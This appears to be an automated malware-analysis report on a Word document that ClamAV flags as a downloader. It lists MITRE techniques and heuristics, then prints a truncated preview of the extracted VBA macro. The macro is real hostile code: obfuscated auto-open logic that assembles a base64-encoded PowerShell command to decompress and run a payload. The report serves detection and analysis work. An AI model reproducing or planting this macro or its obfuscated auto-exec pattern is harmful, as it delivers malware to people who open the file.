MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample contains a VBA macro with an Autoopen subroutine that calls a function which uses the Shell() command. This function appears to construct and execute a command, likely to download and execute a second-stage payload. The ClamAV detection name 'Doc.Downloader.Valyria-6595163-0' further supports this analysis.
Heuristics 7
-
ClamAV: Doc.Downloader.Valyria-6595163-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Valyria-6595163-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9229 bytes |
SHA-256: 1f364312dcd0fb4ef9f69bdc90b2bb72720927f073b01898da142300010425b6 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "zVFhBOzwF" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function RjJwWwlHXId() On Error Resume Next pKbGS = CLng(69163 * CSng(FVHbf + ChrB(voVBi + CInt(88760)))) ipENnF = Int(oVicG) jkGjt = TRVoJ GRAsFR = OzazGN NMPjm = UXZLhl NaKJB = nhoXwQ rsJJl = CLng(1290 * CSng(bEHBl + ChrB(iGirp + CInt(20955)))) KYnoQ = Int(KalYoT) WnbOQ = jPfIT YzQjw = hlwGSE smpvq = SiRfri aPiDi = Ufszt RjJwWwlHXId = TMOUonvskKd + Shell(HuGGzuXbOG + Chr(TsCZQtY + vbKeyP + hjiYrnJw) + "owers" + ADlif + SuljhpbGfST + KcGjakQra + buSKN, 53344 - 53344) mbHiWP = CLng(40676 * CSng(tXnqU + ChrB(cAaGTZ + CInt(5216)))) WRHtbB = Int(oAnvBD) KAvQV = aCcnj nTFmfU = HFqadn mFXAv = lYqaK DvETo = JnOQj End Function Sub Autoopen() On Error Resume Next HbKvw = CLng(39278 * CSng(RcCUV + ChrB(csRCPd + CInt(59329)))) cQvDlB = Int(UAFVV) sTHqa = AtbBa pMbrkw = EmfLPs SSzbz = zUkYKM HdiAPU = wofcQ RjJwWwlHXId iQXMI = CLng(84223 * CSng(MCivzD + ChrB(jUcChX + CInt(18532)))) aEiwuX = Int(inVLq) jzXQS = cFvmB slbMc = twCpTh wavYv = oMKzW lPIha = RdkBlp End Sub Attribute VB_Name = "KbRuOtipE" Function ADlif() On Error Resume Next VjzPw = CLng(36777 * CSng(vMcjp + ChrB(qoFPoA + CInt(89090)))) ARbER = Int(dEMnz) GKlZK = wKqHs CozYI = jQKtVO KjSpr = pmlcfC FVBjRt = TBcCE iWqnZnCm = "HeLL -" + "e LgAoACAAJA" + "BTAG" + "gAZQBsAE" + "wASQBEA" + "FsAMQBdAC" + "sAJ" + "ABTAEgA" + "ZQBMAGwAaQBEA" + "FsA" NEjtNp = CLng(44083 * CSng(zmjVz + ChrB(DVRMS + CInt(42507)))) tNObbb = Int(FJEPlv) kFrOpf = GiUOSl zkQki = TqSSm hvqiR = DVSQaz qwniuM = qTHYn CcCtLqvO = "MQAzAF0A" + "KwAnAFgA" + "JwApA" + "CAAKABOAGUAV" + "wAtAE" + "8AYgBqAG" + "UAQwB0ACAA" CcTtnZ = CLng(54848 * CSng(wjQADi + ChrB(QDhKT + CInt(15557)))) WjMXFi = Int(NoRul) aCYcAU = sNWiq sZQaOU = KFnhP wDlvz = RwoNi JwHzJ = ijXlz vvPLjHq = "aQBPAC4AcwBUA" + "HI" + "ARQBBAE" + "0AUgBFAEEARABlA" + "FIAKAAo" + "ACAATgBlAFcA" NCaOXV = CLng(29494 * CSng(NjWwHR + ChrB(YZlDM + CInt(74480)))) FVPKw = Int(zjwMGo) ziCZTw = qccKsr JHmhlJ = zEzMZl ikJqSk = tWLkNz ctESEr = bKfUfq TvMRELcvjV = "LQBPAGIA" + "agB" + "lAE" + "MAd" + "AAg" aDNuMv = CLng(24689 * CSng(SUZHMQ + ChrB(azXJLU + CInt(22082)))) tUuBCZ = Int(WntaTT) pBDSka = szfZrk wVffOH = ZSuKS wmOlwQ = HWGskk BXPbK = wZSOvE AXAsXoVi = "ACAAcwB5AHMAV" + "ABFAE0ALgBp" + "AE8AL" + "gBjAG8AbQ" + "BwAFIAZQBzAFMA" + "SQBvAE4AL" fQiJI = CLng(33626 * CSng(lGitda + ChrB(ZZPmu + CInt(56939)))) SCDSzc = Int(YTAqrE) rnwkTz = uoVwj XzDbAb = NNfrI uMmiCl = MilSB iXXNhU = vUYQY auXNGu = "gBkAGUAZgBs" + "AEEAdABl" + "AF" + "MAdABS" + "AGUAY" + "QBtACgAIABbA" ADlif = iWqnZnCm + CcCtLqvO + vvPLjHq + TvMRELcvjV + AXAsXoVi + auXNGu End Function Function SuljhpbGfST() On Error Resume Next QpidIF = CLng(55113 * CSng(EMHFSM + ChrB(VoOka + CInt(48295)))) rpzwXs = Int(ZoVKMV) dEdNYz = KPIOH ZfKjz = TztdJ kkfYmu = rhskk BcXha = jPpUtd YOnfPTVQEzG = "HMAeQBT" + "AFQARQ" + "BNAC4ASQBPAC4A" + "bQBFAE0AT" + "wByAFkAcwB" MvBija = CLng(38721 * CSng(oMuldN + ChrB(QUhva + CInt(18282)))) pwQSmZ = Int(uQlvw) KpwIJQ = NPcvwi zVnzDf = GFRQn MtwIqj = waVYlJ iZTVW = wTZcn oPolYD = "0AFIARQB" + "hAE0AXQAgAFsA" + "UwBZA" + "FMAdA" + "BlAE0ALgBDAE8Ab" + "gB2AEU" + "AcgB0A" + "F0AOg" + "A6AEYAUg" + "BvAE0AYgBh" QRDkhr = CLng(42230 * CSng(iTTUE + ChrB(wdZzO + CInt(23482)))) Nhjlwu = Int(vtUTUw) Nupoj = nnPGz FJVta = bwCjX kwqakz = AGAkjj hwFZS = mjoVZz qKQQJDO = "AFMAZQA2ADQAcw" + "B0AHIAaQBOAGcAK" + "AAnAFYAWQAvA" + "FIAVAA" FszNdX = CLng(81456 * CSng(jZNDP + ChrB(wKFYm + CInt(20168)))) jftdR = Int(NEHUAk) uHGnH = tGwXs CTnVj = npiYNG MadzbE = SKMrD RaRJi = BGPcZ dWIabfd = "4AEkAd" + "wBFAE0A" + "Yg" + "AvAGwAVAA" + "0AD" + "AAMgBSAGEAbABD" + "ACsASwBEADAAaA" + "BCAE4AUQBJ" + "AGcAeABLAHM" YYNvbV = CLng(89174 * CSng(DulPGW + ChrB(fErHv + CInt(34462)))) fMYUq = Int(FdwzD) DjzXj = wEPWpB M ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.